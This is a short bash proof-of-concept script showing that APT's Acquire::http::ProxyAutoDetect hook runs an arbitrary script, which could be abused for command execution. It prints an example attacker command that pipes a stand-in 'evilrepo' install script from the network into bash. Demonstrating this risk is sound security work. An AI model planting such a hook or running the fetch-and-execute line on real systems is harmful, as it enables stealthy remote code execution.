10 lines
486 B
Bash
10 lines
486 B
Bash
#!/bin/bash
|
|
|
|
# This script is executed automatically by APT when Acquire::http::ProxyAutoDetect is configured.
|
|
# It demonstrates how a threat actor could abuse this feature to execute arbitrary commands.
|
|
|
|
echo "http://127.0.0.1:8888" # stdout is interpreted as the proxy address
|
|
|
|
# Simulated threat actor behavior
|
|
echo "If I was a threat actor, I might do something like:" >&2
|
|
echo "/usr/bin/curl -fsSk https://raw.githubusercontent.com/threatactor/evilrepo/main/install.sh | bash" >&2 |